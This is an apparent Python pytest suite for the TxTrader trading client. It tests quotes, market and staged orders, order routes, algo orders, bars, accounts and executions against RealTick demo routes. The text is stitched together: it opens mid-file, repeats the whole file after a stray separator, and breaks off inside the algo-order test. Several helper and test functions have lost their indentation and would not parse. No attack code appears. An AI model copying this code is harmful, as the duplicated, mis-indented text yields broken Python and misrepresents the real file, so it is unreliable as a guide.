    Position assertions only apply when WAIT_FOR_FILL is enabled; otherwise
    orders may still be pending when positions are queried.  The unused
    local `route` from the original was removed (_market_order sets its own).
    """
    account = api.account
    # Flatten any existing AAPL position so position checks start from zero.
    oid = _market_order(api, 'AAPL', 1)
    p = _position(api, account)
    if 'AAPL' in p and p['AAPL'] != 0:
        oid = _market_order(api, 'AAPL', -1 * p['AAPL'])
        ostat = api.query_order(oid)
        assert ostat
        assert type(ostat) == dict
        assert 'permid' in ostat
    p = _position(api, account)
    if WAIT_FOR_FILL:
        assert not 'AAPL' in p or p['AAPL'] == 0
    else:
        print('not testing order results')
    oid = _market_order(api, 'AAPL', 100)
    p = _position(api, account)
    assert p
    assert type(p) == dict
    if WAIT_FOR_FILL:
        assert 'AAPL' in p
        assert p['AAPL'] == 100
    else:
        print('not testing order results')
    oid = _market_order(api, 'AAPL', -10)
    p = _position(api, account)
    if WAIT_FOR_FILL:
        assert 'AAPL' in p
        assert p['AAPL'] == 90
    else:
        print('not testing order results')
@pytest.mark.staged
def test_staged_trades(api):
    """Stage a market order and wait for a human to execute it in RealTick."""
    account = api.account
    route = 'DEMOEUR'
    # The first argument tags the staged order with a unique ticket name.
    t = api.stage_market_order('TEST.%s' % str(time.time()), account, route, 'GOOG', 10)
    assert t
    assert type(t) == dict
    assert 'permid' in t
    oid = t['permid']
    print('Created staged order %s, awaiting user execution from RealTick' % oid)
    _wait_for_fill(api, oid)
@pytest.mark.staged
def test_staged_trade_cancel(api):
    """Stage an order; verify a manual RealTick cancel surfaces as 'Error'."""
    account = api.account
    route = 'DEMOEUR'
    t = api.stage_market_order('TEST.%s' % str(time.time()), account, route, 'INTC', 10)
    assert t
    assert type(t) == dict
    assert 'permid' in t
    oid = t['permid']
    print('Created staged order %s, awaiting user cancellation from RealTick' % oid)
    # return_on_error=True: the expected outcome here is an Error status.
    _wait_for_fill(api, oid, True)
    t = api.query_order(oid)
    assert t
    assert type(t) == dict
    assert 'status' in t
    assert t['status'] == 'Error'
    # The raw RealTick payload should carry the user-initiated cancel reason.
    assert 'REASON' in t['raw']
    assert t['raw']['REASON'].lower().startswith('user cancel')
    print('detected user cancel of %s' % oid)
#@pytest.mark.staged
def test_staged_trade_execute(api):
    """Stage an order, cancel it, then resubmit as a live market order."""
    account = api.account
    route = 'DEMOEUR'
    trade_symbol = 'AAPL'
    trade_quantity = 10
    t = api.stage_market_order('TEST.%s' % str(time.time()), account, route, trade_symbol, trade_quantity)
    assert t
    assert type(t) == dict
    assert 'permid' in t
    oid = t['permid']
    status = t['status']
    print('Created staged order %s with status %s, waiting 5 seconds, then changing order to auto-execute' % (oid, status))
    # Staged orders appear as tickets, not as live orders.
    tickets = api.query_tickets()
    assert oid in tickets
    orders = api.query_orders()
    assert not oid in orders
    time.sleep(5)
    status = api.query_order(oid)['status']
    print('cancelling order %s with status=%s...' % (oid, status))
    r = api.cancel_order(oid)
    print('cancel returned %s' % repr(r))
    assert r
    _wait_for_fill(api, oid, True)
    o = api.query_order(oid)
    print('order: %s' % o)
    print('cancel confirmed oid=%s, status=%s' % (oid, o['status']))
    # Resubmit the same trade as a regular (non-staged) market order.
    t = api.market_order(account, route, trade_symbol, trade_quantity)
    assert t
    assert type(t) == dict
    new_oid = t['permid']
    assert new_oid != oid
    print('submitted trade as new order %s' % new_oid)
    _wait_for_fill(api, new_oid)
    print('detected execution of %s' % new_oid)
    o = api.query_order(new_oid)
    if WAIT_FOR_FILL:
        assert o['status'] == 'Filled'
    else:
        print('not testing order results')
def test_query_orders(api):
    # query_orders() always returns a dict (possibly empty).
    orders = api.query_orders()
    assert orders != None
    assert type(orders) == dict
def test_trade_and_query_orders(api):
    """A submitted order appears in query_orders() but not query_tickets()."""
    oid = _market_order(api, 'AAPL', 1)
    orders = api.query_orders()
    assert orders != None
    assert type(orders) == dict
    assert oid in orders
    assert type(orders[oid]) == dict
    assert orders[oid]['permid'] == oid
    assert 'status' in orders[oid]
    tickets = api.query_tickets()
    assert tickets != None
    assert not oid in tickets
def test_query_executions(api):
    # query_executions() always returns a dict (possibly empty).
    execs = api.query_executions()
    assert type(execs) == dict
    assert execs != None
def test_trade_and_query_executions_and_query_order(api):
    """An order's execution shows up in query_executions() keyed back to it."""
    oid = _market_order(api, 'AAPL', 10)
    oid = str(oid)
    print('oid: %s' % oid)
    execs = api.query_executions()
    print('execs: %s' % repr(execs.keys()))
    assert type(execs) == dict
    assert execs != None
    xid = None
    start_time = time.time()
    # Poll until an execution referencing our order id appears.
    while not xid:
        execs = api.query_executions()
        for k, v in execs.items():
            # NOTE: new execution format includes ORIGINAL_ORDER_ID which matches the permid of the associated order
            if str(v['ORIGINAL_ORDER_ID']) == oid:
                xid = k
                print('----------------')
                print('k=%s' % k)
                print('v=%s' % repr(v))
                print('%s %s %s' % (xid, v['ORIGINAL_ORDER_ID'], oid))
        assert (time.time() - start_time) < 10, "timeout waiting for execution results"
    assert xid
    assert str(execs[xid]['ORIGINAL_ORDER_ID']) == oid
    o = api.query_order(oid)
    assert o
    assert oid == o['permid']
    assert 'status' in o
    if WAIT_FOR_FILL:
        assert o['status'] == 'Filled'
"""
ALGO ORDER fields per 2018-07-24 email from Raymond Tsui (rtsui@ezsoft.com)
"""
@pytest.mark.algo
def test_algo_order(api):
    """Submit an order through a RealTick ATDL algo route; restore the route."""
    print()
    ret = api.get_order_route()
    assert type(ret) == dict
    assert len(ret.keys()) == 1
    oldroute = list(ret.keys())[0]
    assert type(oldroute) == str
    assert ret[oldroute] == None
    assert oldroute in ['DEMO', 'DEMOEUR']
    # ATDL strategy parameters for the TEST-ATM-ALGO route.
    algo_order_parameters = {
        "STRAT_ID": "BEST",
        "BOOKING_TYPE": 3,
        "STRAT_TIME_TAGS": "168;126",
        "STRAT_PARAMETERS": {
            "99970": "2",
            "99867": "N",
            "847": "BEST",
            "90057": "BEST",
            "91000": "4.1.95"
        },
        "ORDER_FLAGS_3": 0,
        "ORDER_CLONE_FLAG": 1,
        "STRAT_TARGET": "ATDL",
        "STRATEGY_NAME": "BEST",
        "STRAT_REDUNDANT_DATA": {
            "UseStartTime": "false",
            "UseEndTime": "false",
            "cConditionalType": "{NULL}"
        },
        "STRAT_TIME_ZONE": "America/New_York",
        "STRAT_TYPE": "COWEN_ATM_US_EQT",
        "STRAT_STRING_40": "BEST",
        "UTC_OFFSET": "-240"
    }
    route = 'TEST-ATM-ALGO'
    p = {route: algo_order_parameters}
    ret = api.set_order_route(p)
    assert ret
    assert api.get_order_route() == p
    oid = _market_order(api, 'INTC', 100)
    assert api.query_order(oid)['status'] == 'Filled'
    # Restore the original route for subsequent tests.
    assert api.set_order_route(oldroute)
def test_trade_submission_error_bad_symbol(api):
    """An order for an unknown symbol comes back with status 'Error'."""
    account = api.account
    route = 'DEMOEUR'
    o = api.market_order(account, route, 'BADSYMBOL', 100)
    assert o
    assert o['status'] == 'Error'
    #print('order: %s' % repr(o))
def test_trade_submission_error_bad_quantity(api):
    """A zero-quantity order ends up with status 'Error'."""
    account = api.account
    route = 'DEMOEUR'
    o = api.market_order(account, route, 'AAPL', 0)
    assert o
    # The rejection may be immediate or only surface after the fill wait.
    if o['status'] != 'Error':
        oid = o['permid']
        _wait_for_fill(api, oid, True)
        o = api.query_order(oid)
    assert o['status'] == 'Error'
    #print('order: %s' % repr(o))
#TODO: test other order types
# def json_limit_order(self, args, d):
# """limit_order('symbol', price, quantity) => {'field':, data, ...}
# def json_stop_order(self, args, d):
# """stop_order('symbol', price, quantity) => {'field':, data, ...}
# def json_stoplimit_order(self, args, d):
# """stoplimit_order('symbol', stop_price, limit_price, quantity) => {'field':, data, ...}
@pytest.mark.bars
def test_bars(api):
    """query_bars() returns typed OHLCV rows when the BARCHART flag is on."""
    assert api.add_symbol('SPY')
    # Fixed historical window for a reproducible bar query.
    sbar = '2017-08-29 09:30:00'
    ebar = '2017-08-29 09:40:00'
    bars = api.query_bars('SPY', 1, sbar, ebar)
    if _verify_barchart_enabled(api, 'BARCHART'):
        assert bars
        assert type(bars) == list
        for bar in bars:
            assert type(bar) == list
            # Columns: date, time, open, high, low, close, volume.
            b_date, b_time, b_open, b_high, b_low, b_close, b_volume = bar
            assert type(b_date) == str
            assert re.match('^\\d\\d\\d\\d-\\d\\d-\\d\\d$', b_date)
            assert type(b_time) == str
            assert re.match('^\\d\\d:\\d\\d:\\d\\d$', b_time)
            assert type(b_open) == float
            assert type(b_high) == float
            assert type(b_low) == float
            assert type(b_close) == float
            assert type(b_volume) == int
            print('%s %s %.2f %.2f %.2f %.2f %d' % (b_date, b_time, b_open, b_high, b_low, b_close, b_volume))
    else:
        assert not bars
    print('bars=%s' % repr(bars))
def test_cancel_order(api):
    # Presumably '000' is a nonexistent order id — cancel still responds
    # truthy; confirm against the server's cancel semantics.
    ret = api.cancel_order('000')
    assert ret
def test_global_cancel(api):
    # Cancel all open orders; expect a truthy acknowledgement.
    ret = api.global_cancel()
    assert ret
@pytest.mark.skip
def json_gateway_logon(api):
    # NOTE(review): the name lacks the test_ prefix, so pytest would never
    # collect this even without the skip mark — confirm whether intended.
    ret = api.gateway_logon('user', 'passwd')
    assert ret
@pytest.mark.skip
def test_gateway_logoff(api):
    # Marked skip; exercises gateway_logoff() only when explicitly enabled.
    ret = api.gateway_logoff()
    assert ret
@pytest.mark.skip
def test_set_primary_exchange(api):
    # Exchange naming differs between backends.
    if TEST_MODE == 'RTX':
        exchange = 'NAS'
    elif TEST_MODE == 'TWS':
        exchange = 'NASDAQ'
    # NOTE(review): `exchange` is unbound if TEST_MODE is neither value;
    # harmless while the test is skipped, but worth a final else clause.
    assert api.set_primary_exchange('MSFT', exchange)
    assert api.add_symbol('MSFT')
    assert api.query_symbol('MSFT')
def test_help(api):
    # help() returns a truthy help structure.
    # NOTE: the local name shadows the help() builtin within this test.
    help = api.help()
    assert help
| # -*- coding: utf-8 -*-
"""
test-txtrader.py
--------------
TxTrader unit/regression test script
Copyright (c) 2016 Reliance Systems Inc. <mkrueger@rstms.net>
Licensed under the MIT license. See LICENSE for details.
"""
from txtrader_client import API
import subprocess
import os
import signal
import time
import ujson as json
from pprint import pprint, pformat
import pytest
import re
import datetime
# When True, poll orders until they fill; when False, accept 'Pending'.
WAIT_FOR_FILL = False
# Seconds to wait for an order fill before failing the test.
FILL_TIMEOUT = 30
# Raw JSON order-route definition exercised by test_set_order_route().
TEST_ALGO_ROUTE = '{"TEST-ATM-ALGO":{"STRAT_ID":"BEST","BOOKING_TYPE":"3","STRAT_TIME_TAGS":"168;126","STRAT_PARAMETERS":{"99970":"2","99867":"N","847":"BEST","90057":"BEST","91000":"4.1.95"},"ORDER_FLAGS_3":"0","ORDER_CLONE_FLAG":"1","STRAT_TARGET":"ATDL","STRATEGY_NAME":"BEST","STRAT_REDUNDANT_DATA":{"UseStartTime":"false","UseEndTime":"false","cConditionalType":"{NULL}"},"STRAT_TIME_ZONE":"America/New_York","STRAT_TYPE":"COWEN_ATM_US_EQT","STRAT_STRING_40":"BEST","UTC_OFFSET":"-240"}}'
# Backend under test; the suite branches on 'RTX' (RealTick) vs 'TWS'.
TEST_MODE = 'RTX'
# Service endpoint; both environment variables must be set before running.
TEST_HOST = os.environ['TXTRADER_HOST']
TEST_PORT = int(os.environ['TXTRADER_HTTP_PORT'])
def _listening(host, port, timeout=15):
    """Return True once host:port accepts connections (wait-for-it CLI)."""
    return not bool(os.system(f'wait-for-it -s {host}:{port} -t {timeout}'))
def _wait_api_status(TEST_MODE, timeout=15):
    """Poll until the txtrader service reports status 'Up'; return the client.

    Reconnects from scratch on any connection or status-query error, and
    asserts if the service is not up within `timeout` seconds.
    """
    start = time.time()
    status = None
    last_status = None
    api = None
    while status != 'Up':
        try:
            if not api:
                api = API(TEST_MODE)
                print(f'new api connection: {api}')
        except Exception as ex:
            # Connection failed: drop the client and retry from scratch.
            print(f'Connection raised {ex}, retrying...')
            api = None
            time.sleep(1)
        else:
            assert api
            try:
                status = api.status()
            except Exception as ex:
                # Status query failed: also reconnect from scratch.
                print(f'status query on {api} raised {ex}, retrying...')
                api = None
                time.sleep(1)
            else:
                if last_status != status:
                    # Only log status transitions to keep output readable.
                    print(f"status={status}")
                last_status = status
        assert (time.time() - start) < timeout, 'timeout waiting for initialization'
        time.sleep(1)
    return api
@pytest.fixture(scope='module')
def api():
    """Module-scoped txtrader API client, connected and reporting 'Up'."""
    print('fixture: creating api connection')
    assert _listening(TEST_HOST, TEST_PORT)
    api = _wait_api_status(TEST_MODE)
    return api
def dump(label, o):
    """Print *o* JSON-encoded and pretty-formatted under a *label* heading."""
    encoded = pformat(json.dumps(o))
    print('%s:\n%s' % (label, encoded))
def test_init(api):
    """Smoke test: the module api fixture is connected and reports 'Up'."""
    print()
    print('test_init checking api')
    assert api
    assert api.status() == 'Up'
    # Give the freshly-started server a moment before the heavier tests run.
    print('waiting 1 second...')
    time.sleep(1)
    print('done')
def test_shutdown_and_reconnect():
    """Request a server shutdown, then verify the service restarts and comes back Up.

    Uses its own API connection (not the module fixture) because the
    connection is deliberately torn down.
    """
    print('\nconnecting...')
    api = _wait_api_status(TEST_MODE)
    assert api
    assert api.status() == 'Up'
    # NOTE: removed unused locals 'shutdown_time' and 'shutdown' (both were
    # assigned time.time() and never read).
    print('shutting down api')
    try:
        api.shutdown('testing shutdown request')
        print('waiting for shutdown...')
        time.sleep(5)
        print('waiting for restart...')
    except Exception as ex:
        print(f'shutdown raised {ex}')
        assert False
    # Allow up to 60 seconds for the supervisor to restart the listener.
    assert _listening(TEST_HOST, TEST_PORT, 60), 'timeout waiting for restart'
    try:
        api = _wait_api_status(TEST_MODE, 90)
    except Exception as ex:
        print(f'restart raised {ex}')
        assert False
    assert api
    assert api.status() == 'Up'
def test_stock_prices(api):
    """Exercise add_symbol/query_symbol/del_symbol and validate price fields."""
    slist = set(api.query_symbols())
    s = api.add_symbol('IBM')
    assert s
    p = api.query_symbol('IBM')
    assert p
    assert type(p) == dict
    print(repr(p))
    # (field name, expected type, required?)
    tdata = [
        ('symbol', str, True),
        ('fullname', str, True),
        ('last', float, True),
        ('size', int, True),
        ('volume', int, True),
        ('open', float, True),
        ('high', float, True),
        ('low', float, True),
        ('close', float, True),
        ('vwap', float, True),
        ('tradetime', str, True),
        ('cusip', str, True),
    ]
    #('bars', list, True),
    for key, _type, required in tdata:
        assert key in p
        assert type(p[key]) == _type
        if required:
            # 'is not None' replaces the old 'not p[key] == None' (PEP 8).
            assert p[key] is not None
    r = api.query_symbol_data('IBM')
    assert r
    dump('raw data for IBM', r)
    # 'symbols' replaces the ambiguous single-letter local 'l' (PEP 8 E741).
    symbols = api.query_symbols()
    assert symbols
    dump('symbol list', symbols)
    assert 'IBM' in symbols
    s = api.add_symbol('TSLA')
    assert s
    dump('add TSLA', s)
    s = api.add_symbol('GOOG')
    assert s
    dump('add GOOG', s)
    s = api.add_symbol('AAPL')
    assert s
    dump('add AAPL', s)
    symbols = api.query_symbols()
    assert set(['IBM', 'TSLA', 'GOOG', 'AAPL']).issubset(set(symbols))
    dump('symbol list', symbols)
    s = api.del_symbol('TSLA')
    assert s
    dump('del TSLA', s)
    symbols = api.query_symbols()
    # Only expect TSLA to be gone if it wasn't already subscribed beforehand.
    if not 'TSLA' in slist:
        assert not 'TSLA' in symbols
    assert set(['IBM', 'GOOG', 'AAPL']).issubset(set(symbols))
    dump('symbol list', symbols)
    print(repr(symbols))
def test_buy_sell(api):
    """Buy 100 IBM at market, then sell them back, validating the order records."""
    print()
    account = api.account
    print('account=%s' % account)
    api.set_account(account)
    print('buying IBM')
    buy_oid = _market_order(api, 'IBM', 100)
    buy_order = api.query_order(buy_oid)
    assert buy_order
    assert type(buy_order) == dict
    assert 'permid' in buy_order
    buy_oid = buy_order['permid']
    assert 'status' in buy_order
    dump('market_order(IBM,100)', buy_order)
    print('selling IBM')
    sell_oid = _market_order(api, 'IBM', -100)
    sell_order = api.query_order(sell_oid)
    assert sell_order
    assert type(sell_order) == dict
    assert 'permid' in sell_order
    assert 'status' in sell_order
    dump('market_order(IBM,-100)', sell_order)
def test_set_order_route(api):
    """Verify set_order_route/get_order_route accept all supported input forms.

    Routes may be passed as a bare string, a dict (with or without algo
    parameters), or a JSON-encoded string of either; the getter always
    returns the canonical dict form.
    """
    print()
    oldroute = api.get_order_route()
    assert type(oldroute) == dict
    assert list(oldroute.keys()) == ['DEMOEUR']
    r0 = 'DEMO'
    r1 = {'DEMO': None}
    r2 = {'DEMO': {'key1': 'value1', 'key2': 'value2'}}
    r3 = TEST_ALGO_ROUTE
    # Pairs of (input form, expected canonical dict returned by the server).
    for rin, rout in [(r0, r1), (r1, r1), (r2, r2), (json.dumps(r0), r1), (json.dumps(r1), r1), (json.dumps(r2), r2),
                      (r3, json.loads(r3))]:
        print('set_order_route(%s)' % repr(rin))
        assert api.set_order_route(rin) == rout
        assert api.get_order_route() == rout
    # Restore the route so later tests see the expected DEMOEUR default.
    assert api.set_order_route(oldroute) == oldroute
def test_partial_fill(api):
    """Buy a large lot on the DEMO route and verify at least one partial fill occurs.

    Verification is disabled (partial_fills forced to -1) when the simulated
    market is closed, since no fills would arrive.
    """
    print()
    account = api.account
    route = 'DEMO'
    oldroute = api.get_order_route()
    assert api.set_order_route(route)
    assert api.get_order_route() == {route: None}
    quantity = 1000
    symbol = 'COWN'
    print('buying %d %s' % (quantity, symbol))
    p = api.add_symbol(symbol)
    assert p
    d = api.query_symbol_data(symbol)
    #pprint(d)
    now = datetime.datetime.now().strftime('%H:%M:%S')
    print(f"trading hours: {d['STARTTIME']} to {d['STOPTIME']}")
    during_trading_hours = bool(d['STARTTIME'] <= now <= d['STOPTIME'])
    print(f"now={now} during_trading_hours={during_trading_hours}")
    o = api.market_order(account, route, symbol, quantity)
    assert o
    assert 'permid' in o
    assert 'status' in o
    # A 1000-share order on the demo route should not fill instantly.
    assert not o['status'] == 'Filled'
    oid = o['permid']
    print('oid=%s' % oid)
    partial_fills = 0
    while o['status'] != 'Filled':
        o = api.query_order(oid)
        #o={'status':'spoofed','TYPE':'spoofed'}
        #pprint(o)
        status = o['status']
        filled = o['filled'] if 'filled' in o else 0
        remaining = o['remaining'] if 'remaining' in o else 0
        # A partial fill: some, but not all, of the shares are filled.
        if (int(filled) > 0) and (int(remaining) > 0) and (int(filled) < quantity):
            partial_fills += 1
        average_price = o['avgfillprice'] if 'avgfillprice' in o else None
        print(
            'status=%s filled=%s remaining=%s average_price=%s type=%s' % (status, filled, remaining, average_price, o['type'])
        )
        # A 'Filled' order must never report fewer shares than requested.
        assert not (status == 'Filled' and filled < quantity)
        if not during_trading_hours:
            print('test verification disabled - simulated market is closed')
            partial_fills = -1
            break
        assert status in ['Submitted', 'Pending', 'Filled']
        time.sleep(1)
    assert partial_fills
    # Flatten the position and restore the original route.
    o = api.market_order(account, route, symbol, quantity * -1)
    assert api.set_order_route(oldroute)
def test_status(api):
assert api.status() == 'Up'
def test_uptime(api):
uptime = api.uptime()
assert uptime
print('uptime: %s' % repr(uptime))
assert type(uptime) == str
def test_version(api):
assert api.version()
def test_symbol_price(api):
    """Delete and re-add AAPL, verifying query_symbol behavior in both states."""
    orig_symbols = api.query_symbols()
    assert type(orig_symbols) == list
    if 'AAPL' in orig_symbols:
        ret = api.del_symbol('AAPL')
        assert ret
    symbols = api.query_symbols()
    assert type(symbols) == list
    if not 'AAPL' in orig_symbols:
        assert not 'AAPL' in symbols
    # Querying an unsubscribed symbol still returns data (see disabled assert).
    price = api.query_symbol('AAPL')
    #assert not price
    assert price
    ret = api.add_symbol('AAPL')
    assert ret
    p = api.query_symbol('AAPL')
    assert p
    assert type(p) == dict
    assert p['symbol'] == 'AAPL'
def _verify_barchart_enabled(api, option):
v = api.version()
assert option in ['SYMBOL_BARCHART', 'BARCHART']
assert v
assert type(v) == dict
assert type(v['flags']) == dict
assert option in v['flags']
return v['flags'][option] == True
def test_symbol_bars(api):
    """Re-add TSLA and validate the per-symbol intraday bar data format."""
    if 'TSLA' in api.query_symbols():
        assert api.del_symbol('TSLA')
    assert api.add_symbol('TSLA')
    assert 'TSLA' in api.query_symbols()
    bars = api.query_symbol_bars('TSLA')
    assert type(bars) == list
    print(repr(bars))
    if _verify_barchart_enabled(api, 'SYMBOL_BARCHART'):
        assert type(bars[0]) == list
        for bar in bars:
            print('%s' % repr(bar))
            # Per-column expected types: date, time, open, high, low, close,
            # volume. Indexing the outer list yields the one-element type list
            # for column i, so this is a membership test against e.g. [float].
            for i in range(len(bar)):
                assert type(bar[i]) in [[str], [str], [float], [float], [float], [float], [int]][i]
            assert re.match('^\\d\\d\\d\\d-\\d\\d-\\d\\d$', bar[0])
            assert re.match('^\\d\\d:\\d\\d:\\d\\d$', bar[1])
    else:
        # Feature disabled server-side: expect an empty list.
        print('barchart disabled')
        assert bars == []
def test_query_accounts(api):
    """Validate account listing, field queries, and the synthetic _cash field."""
    test_account = api.account
    accounts = api.query_accounts()
    assert type(accounts) == list
    assert accounts
    for a in accounts:
        assert type(a) == str or type(a) == str
    assert test_account in accounts
    ret = api.set_account(test_account)
    assert ret
    # Invalid account or field queries return None rather than raising.
    ret = api.query_account('b.b.b.INVALID_ACCOUNT')
    assert ret == None
    ret = api.query_account(test_account, 'INVALID_FIELD')
    assert ret == None
    ret = api.query_account(test_account, 'INVALID_FIELD_1,INVALID_FIELD_2')
    assert ret == None
    #print('query_account(%s)...' % a)
    data = api.query_account(test_account)
    #print('account[%s]: %s' % (a, repr(data)))
    assert data
    assert type(data) == dict
    # Leading-underscore keys are synthetic fields added by txtrader itself.
    fields = [k for k in data if not k.startswith('_')]
    # The backing field for cash differs per backend.
    if TEST_MODE == 'RTX':
        field = 'EXCESS_EQ'
    elif TEST_MODE == 'TWS':
        field = 'LiquidationValue'
    # txtrader is expected to set the value _cash to the correct field
    assert '_cash' in data
    assert float(data['_cash']) == round(float(data[field]), 2)
    sdata = api.query_account(test_account, field)
    assert sdata
    assert type(sdata) == dict
    assert field in sdata
    # Comma-separated multi-field queries return exactly the requested keys.
    rfields = ','.join(fields[:3])
    print('requesting fields: %s' % rfields)
    sdata = api.query_account(test_account, rfields)
    print('got %s' % repr(sdata))
    assert sdata
    assert type(sdata) == dict
    for field in rfields.split(','):
        assert field in sdata
    assert set(rfields.split(',')) == set(sdata.keys())
    #print('account[%s]: %s' % (a, repr(sdata)))
def _wait_for_fill(api, oid, return_on_error=False):
    """Poll order *oid* until its status reaches 'Filled'.

    Args:
        api: connected API client.
        oid: order permid to poll.
        return_on_error: if True, return quietly when the order status is
            'Error' instead of asserting.

    When the module flag WAIT_FOR_FILL is False, a 'Pending' status returns
    immediately instead of blocking; otherwise polling is bounded by
    FILL_TIMEOUT seconds.
    """
    print('Waiting for order %s to fill...' % oid)
    done = False
    last_status = ''
    count = 0
    while not done:
        o = api.query_order(oid)
        # Log only status transitions to keep output readable.
        if last_status != o['status']:
            last_status = o['status']
            print('order status: %s' % o['status'])
        if return_on_error and o['status'] == 'Error':
            return
        assert o['status'] != 'Error'
        if o['status'] == 'Filled':
            done = True
        else:
            count += 1
            if WAIT_FOR_FILL:
                assert count < FILL_TIMEOUT
                time.sleep(1)
            else:
                if o['status'] == 'Pending':
                    print("fill wait disabled, returning")
                    done = True
def _position(api, account):
pos = api.query_positions()
assert type(pos) == dict
assert account in pos
if account in pos:
p = pos[account]
assert type(p) == dict
else:
p = {}
return p
def _market_order(api, symbol, quantity, return_on_error=False):
    """Submit a market order on the DEMOEUR route and wait for it to fill.

    Args:
        api: connected API client.
        symbol: ticker symbol to trade.
        quantity: signed share count (negative sells).
        return_on_error: passed through to _wait_for_fill().

    Returns:
        str: the order's permid.
    """
    print('Sending market_order(%s, %d)...' % (symbol, quantity))
    account = api.account
    route = 'DEMOEUR'
    o = api.market_order(account, route, symbol, quantity)
    print('market_order returned %s' % repr(o))
    assert o
    assert 'permid' in o
    assert 'status' in o
    oid = o['permid']
    assert type(oid) == str
    print('market_order(%s,%s) returned oid=%s status=%s' % (symbol, quantity, oid, o['status']))
    _wait_for_fill(api, oid, return_on_error)
    return oid
def test_trades(api):
    """Flatten any AAPL position, then buy 100 and sell 10, checking positions."""
    account = api.account
    route = 'DEMOEUR'  # NOTE(review): unused here; _market_order supplies its own route
    oid = _market_order(api, 'AAPL', 1)
    p = _position(api, account)
    # Flatten any existing AAPL position so the counts below are predictable.
    if 'AAPL' in p and p['AAPL'] != 0:
        oid = _market_order(api, 'AAPL', -1 * p['AAPL'])
        ostat = api.query_order(oid)
        assert ostat
        assert type(ostat) == dict
        assert 'permid' in ostat
    p = _position(api, account)
    # Position assertions only hold when we actually waited for fills.
    if WAIT_FOR_FILL:
        assert not 'AAPL' in p or p['AAPL'] == 0
    else:
        print('not testing order results')
    oid = _market_order(api, 'AAPL', 100)
    p = _position(api, account)
    assert p
    assert type(p) == dict
    if WAIT_FOR_FILL:
        assert 'AAPL' in p
        assert p['AAPL'] == 100
    else:
        print('not testing order results')
    oid = _market_order(api, 'AAPL', -10)
    p = _position(api, account)
    if WAIT_FOR_FILL:
        assert 'AAPL' in p
        assert p['AAPL'] == 90
    else:
        print('not testing order results')
@pytest.mark.staged
def test_staged_trades(api):
    """Stage a GOOG order and wait for a human to execute it from RealTick."""
    account = api.account
    route = 'DEMOEUR'
    # Unique ticket tag (timestamp) so repeated runs don't collide.
    t = api.stage_market_order('TEST.%s' % str(time.time()), account, route, 'GOOG', 10)
    assert t
    assert type(t) == dict
    assert 'permid' in t
    oid = t['permid']
    print('Created staged order %s, awaiting user execution from RealTick' % oid)
    _wait_for_fill(api, oid)
@pytest.mark.staged
def test_staged_trade_cancel(api):
    """Stage an INTC order and verify a manual RealTick cancel surfaces as an Error."""
    account = api.account
    route = 'DEMOEUR'
    t = api.stage_market_order('TEST.%s' % str(time.time()), account, route, 'INTC', 10)
    assert t
    assert type(t) == dict
    assert 'permid' in t
    oid = t['permid']
    print('Created staged order %s, awaiting user cancellation from RealTick' % oid)
    # return_on_error=True: a user cancel is the expected outcome here.
    _wait_for_fill(api, oid, True)
    t = api.query_order(oid)
    assert t
    assert type(t) == dict
    assert 'status' in t
    assert t['status'] == 'Error'
    # The raw broker payload carries the cancellation reason.
    assert 'REASON' in t['raw']
    assert t['raw']['REASON'].lower().startswith('user cancel')
    print('detected user cancel of %s' % oid)
#@pytest.mark.staged
def test_staged_trade_execute(api):
    """Stage an order, cancel it programmatically, then resubmit it as a live order."""
    account = api.account
    route = 'DEMOEUR'
    trade_symbol = 'AAPL'
    trade_quantity = 10
    t = api.stage_market_order('TEST.%s' % str(time.time()), account, route, trade_symbol, trade_quantity)
    assert t
    assert type(t) == dict
    assert 'permid' in t
    oid = t['permid']
    status = t['status']
    print('Created staged order %s with status %s, waiting 5 seconds, then changing order to auto-execute' % (oid, status))
    # Staged orders appear in the tickets list, not the orders list.
    tickets = api.query_tickets()
    assert oid in tickets
    orders = api.query_orders()
    assert not oid in orders
    time.sleep(5)
    status = api.query_order(oid)['status']
    print('cancelling order %s with status=%s...' % (oid, status))
    r = api.cancel_order(oid)
    print('cancel returned %s' % repr(r))
    assert r
    _wait_for_fill(api, oid, True)
    o = api.query_order(oid)
    print('order: %s' % o)
    print('cancel confirmed oid=%s, status=%s' % (oid, o['status']))
    # Resubmit as a normal (non-staged) market order; it must get a new permid.
    t = api.market_order(account, route, trade_symbol, trade_quantity)
    assert t
    assert type(t) == dict
    new_oid = t['permid']
    assert new_oid != oid
    print('submitted trade as new order %s' % new_oid)
    _wait_for_fill(api, new_oid)
    print('detected execution of %s' % new_oid)
    o = api.query_order(new_oid)
    if WAIT_FOR_FILL:
        assert o['status'] == 'Filled'
    else:
        print('not testing order results')
def test_query_orders(api):
orders = api.query_orders()
assert orders != None
assert type(orders) == dict
def test_trade_and_query_orders(api):
    """Submit an order and verify it appears in query_orders but not query_tickets."""
    oid = _market_order(api, 'AAPL', 1)
    orders = api.query_orders()
    assert orders != None
    assert type(orders) == dict
    assert oid in orders
    assert type(orders[oid]) == dict
    assert orders[oid]['permid'] == oid
    assert 'status' in orders[oid]
    tickets = api.query_tickets()
    assert tickets != None
    # Regular orders must not show up as staged tickets.
    assert not oid in tickets
def test_query_executions(api):
execs = api.query_executions()
assert type(execs) == dict
assert execs != None
def test_trade_and_query_executions_and_query_order(api):
    """Submit an order, then find its execution record and cross-check the order."""
    oid = _market_order(api, 'AAPL', 10)
    oid = str(oid)
    print('oid: %s' % oid)
    execs = api.query_executions()
    print('execs: %s' % repr(execs.keys()))
    assert type(execs) == dict
    assert execs != None
    xid = None
    start_time = time.time()
    # Poll until the execution referencing our order id appears (max 10s).
    while not xid:
        execs = api.query_executions()
        for k, v in execs.items():
            # NOTE: new execution format includes ORIGINAL_ORDER_ID which matches the permid of the associated order
            if str(v['ORIGINAL_ORDER_ID']) == oid:
                xid = k
                print('----------------')
                print('k=%s' % k)
                print('v=%s' % repr(v))
                print('%s %s %s' % (xid, v['ORIGINAL_ORDER_ID'], oid))
        assert (time.time() - start_time) < 10, "timeout waiting for execution results"
    assert xid
    assert str(execs[xid]['ORIGINAL_ORDER_ID']) == oid
    o = api.query_order(oid)
    assert o
    assert oid == o['permid']
    assert 'status' in o
    if WAIT_FOR_FILL:
        assert o['status'] == 'Filled'
"""
ALGO ORDER fields per 2018-07-24 email from Raymond Tsui (rtsui@ezsoft.com)
"""
@pytest.mark.algo
def test_algo_order(api):
    """Set an ATM algo route, submit an order through it, and restore the old route."""
    print()
    ret = api.get_order_route()
    assert type(ret) == dict
    assert len(ret.keys()) == 1
    oldroute = list(ret.keys())[0]
    assert type(oldroute) == str
    assert ret[oldroute] == None
    assert oldroute in ['DEMO', 'DEMOEUR']
    algo_order_parameters = {
        "STRAT_ID": "BEST",
